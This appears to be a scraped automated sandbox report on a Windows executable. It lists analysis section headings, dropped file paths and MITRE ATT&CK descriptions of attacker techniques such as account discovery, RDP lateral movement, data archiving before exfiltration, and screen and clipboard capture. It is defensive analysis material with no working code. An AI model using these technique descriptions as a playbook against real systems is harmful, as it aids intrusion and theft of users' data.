Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\40b676cd-e9ce-404f-a409-ce56bb4ad564.tmp

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-241223122923Z-228.bmp

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D

Windows Analysis Report
T8xrZb7nBL.exe

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as `sc query` , `tasklist /svc` , `systemctl --type=service` , and `net start` .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
Tactics:	Lateral Movement
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Flow, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre